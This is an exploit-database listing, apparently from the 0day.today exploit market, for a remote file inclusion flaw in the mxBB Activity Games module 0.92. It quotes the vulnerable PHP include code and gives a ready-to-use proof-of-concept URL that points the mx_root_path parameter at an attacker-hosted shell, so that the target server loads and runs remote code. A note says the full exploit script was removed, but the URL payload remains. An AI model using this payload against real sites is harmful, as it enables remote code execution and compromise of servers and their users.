[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

mxBB Module Activity Games 0.92 Remote File Include Vulnerability

Author
3l3ctric-Cracker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1252
Category
web applications
Date add
11-12-2006
Platform
unsorted
=================================================================
mxBB Module Activity Games 0.92 Remote File Include Vulnerability
=================================================================



# mx_act (mxBB Games Module)   --Remote File Inclusion Exploit
# Bug Found & Exploit [c]oded By Dr Max Virus

Problem area:

	if ( !file_exists($mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx ) )
	{
	  	include( $mx_root_path . 'modules/mx_act/language/lang_english/lang_activity.'.$phpEx );
		$link_language='lang_english';
	}	
	else
	{
	  	include(  $mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx );
		$link_language='lang_' . $board_config['default_lang'];
	} 

PoC:
	
	http://site.com/mxBB/modules/mx_act/include/constants/act_constants.php?mx_root_path=http://[yourshell]?&	
	

# exploit was broken and removed.



#  0day.today [2024-12-25]  #